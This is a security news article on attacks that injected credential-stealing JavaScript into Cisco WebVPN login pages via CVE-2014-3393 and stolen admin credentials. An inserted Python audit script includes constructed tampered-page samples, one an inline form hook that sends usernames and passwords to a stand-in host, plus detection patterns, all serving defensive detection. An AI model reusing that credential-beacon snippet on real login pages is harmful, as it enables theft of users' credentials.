Attackers Target Organizations via Cisco WebVPN

A Cisco VPN product has been targeted by malicious actors looking to steal sensitive credentials and maintain access to compromised networks, according to incident response and threat intelligence company Volexity.

The security firm says it has spotted attacks against several organizations via the Cisco Clientless SSL VPN (WebVPN), a feature of the Cisco Adaptive Security Appliance (ASA) that lets users reach the corporate network through a web-based portal instead of a full VPN client. Because the portal can expose internal files and web resources to anyone who authenticates, its login page is a high-value target and needs to be protected accordingly.

According to experts, attackers have used two different methods to compromise access credentials by targeting the login page used by Cisco WebVPN customers.

The first method involves a portal customization integrity flaw (CVE-2014-3393) whose existence was disclosed by Cisco in October 2014. The vulnerability, caused by improper authentication checks in the portal’s customization framework, allows a remote, unauthenticated attacker to modify the content of the WebVPN portal. The changes made by the attacker are persistent even if the device is reloaded or the ASA software is changed.

In November 2014, shortly after Cisco patched the vulnerability, Alec Stuart-Muirk, the researcher who reported the security hole to the networking giant, released additional details along with a Metasploit module designed to exploit the weakness.

By February 2015, attacks exploiting CVE-2014-3393 had already been spotted in the wild and Cisco released a security notice to warn customers and provide them the information needed to detect attacks and remove the malicious code.

“An exploit could allow an unauthenticated and unauthorized attacker to modify the content of the Clientless SSL VPN portal and include malicious code which could be used for several types of web-based attack, which include and are not limited to XSS, stealing of credentials, serving malware, etc.,” Stefano De Crescenzo, Incident Manager at Cisco’s Product Security Incident Response Team (PSIRT), said at the time.

In the attacks observed by Volexity, the attackers injected malicious JavaScript into the targeted organization’s login page. The injected code loaded a script hosted on a remote server, and that script harvested whatever users typed into the login form and sent it to the attackers.
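An outside-in check a defender can run against the portal, added here as an example and not code from Volexity, Cisco or the article: retrieve the login page the way a browser would, enumerate every script it pulls in, and flag anything sourced from, or phoning home to, a host other than the appliance itself, optionally comparing the page against a hash captured while the device was known-good. Both tamper patterns described above (a remote script tag and an inline form hook) are covered. The sample pages, the hostnames and the ASA paths inside them are constructed for this example; `TRUSTED_HOSTS` is an assumed value a site would replace with its own VPN FQDN.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption for this example: the only host the login page may load scripts
# from, or send data to, is the appliance itself.
TRUSTED_HOSTS = {"vpn.example.com"}

# Constructed sample of a clean Clientless SSL VPN login page. Paths and form
# names are illustrative, not copied from a real appliance.
CLEAN_PAGE = """<html><head><title>SSL VPN Service</title>
<script src="/+CSCOE+/win.js"></script></head>
<body><form method="post" action="/+webvpn+/index.html">
<input name="username"><input name="password" type="password">
</form></body></html>"""

# Tamper pattern 1: an extra script tag pointing at a third-party (compromised) site.
TAMPERED_EXTERNAL = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://ngo-site.example.org/js/form.js"></script></body>')

# Tamper pattern 2: inline JavaScript that hooks the form and beacons credentials out.
TAMPERED_INLINE = CLEAN_PAGE.replace(
    "</body>",
    "<script>document.forms[0].onsubmit=function(){new Image().src="
    "'https://ngo-site.example.org/c?u='+encodeURIComponent(username.value)"
    "+'&p='+encodeURIComponent(password.value)}</script></body>")

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
CRED_RE = re.compile(r"\b(username|password)\b", re.I)
SEND_RE = re.compile(r"\b(onsubmit|addEventListener|XMLHttpRequest|fetch|Image)\b")


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def page_sha256(html):
    """Hash of the served page, to be recorded while the device is known-good."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def untrusted_host(url, trusted_hosts):
    """True if the URL is absolute and names a host outside the trusted set."""
    host = urlsplit(url).hostname
    return bool(host) and host.lower() not in trusted_hosts


def audit_login_page(html, trusted_hosts, baseline_sha256=None):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    collector = ScriptCollector()
    collector.feed(html)
    for src in collector.external:
        if untrusted_host(src, trusted_hosts):
            findings.append(f"external script from untrusted host: {src}")
    for body in collector.inline:
        for url in URL_RE.findall(body):
            if untrusted_host(url, trusted_hosts):
                findings.append(f"inline script contacts untrusted host: {url}")
        if CRED_RE.search(body) and SEND_RE.search(body):
            findings.append("inline script reads credential fields and sends data")
    if baseline_sha256 is not None and page_sha256(html) != baseline_sha256:
        findings.append("page hash differs from known-good baseline")
    return findings


if __name__ == "__main__":
    baseline = page_sha256(CLEAN_PAGE)
    for name, page in [("clean", CLEAN_PAGE), ("external", TAMPERED_EXTERNAL),
                       ("inline", TAMPERED_INLINE)]:
        print(name, audit_login_page(page, TRUSTED_HOSTS, baseline))
```

In practice the page would be fetched over HTTPS from a monitoring host rather than embedded, and the baseline hash re-recorded after every legitimate customization change; the host allow-list catches the campaigns described here because both the Volexity script and the Scanbox loader were served from infrastructure outside the victim's own appliance.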

In one campaign observed by the security firm, the attackers hosted the script on the hacked website of a legitimate NGO. The list of victims included medical organizations, think tanks, NGOs, universities and academic institutions, and multinational electronics and manufacturing companies.

While in some cases the malicious actors leveraged the Cisco WebVPN exploit to modify the login page, researchers believe some attackers also planted their code by gaining administrative access to the system.

“Attackers are typically able to gain ‘legitimate’ access throughout a victim organization’s environment by installing keyloggers, dumping credentials from systems, exfiltrating documents (spreadsheets) that contain password lists, and identifying passwords that are commonly reused by administrators,” Volexity founder Steven Adair explained in a blog post on Wednesday. “Once armed with these credentials, an attacker with access to a victim’s network can typically perform the same functions as any administrator or highly-privileged individual within the company.”

In some cases it’s also possible that the attackers modified the login page after obtaining administrative credentials for the Cisco ASA appliance, Adair noted.

Many of the attacks observed by Volexity were aimed at high-tech and government organizations in Japan. In these attacks, malicious actors modified the Cisco WebVPN login pages to load JavaScript code associated with the reconnaissance framework called “Scanbox.” The framework, which appears to be used primarily by Chinese APT actors, has been spotted in operations aimed at Japanese organizations in the industrial sector, the Uyghur population in China, a US-based think tank, and a Korean organization in the hospitality sector.

While it’s mainly designed for reconnaissance, Scanbox also allows its operators to capture keystrokes and collect cookie data.

An analysis of the hostnames and domains used by the attackers monitored by Volexity revealed that they owned domains designed to look like they were affiliated with Google, Symantec and the Swiss multinational pharmaceutical company Novartis. Some of the hostnames were also linked to activity associated with PlugX, a piece of malware often used by Chinese actors.

WebVPN is not the only Cisco product targeted by malicious actors. Last month, researchers reported uncovering hundreds of Cisco routers on which attackers had planted malicious firmware by leveraging stolen credentials and a legitimate process available to administrators.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
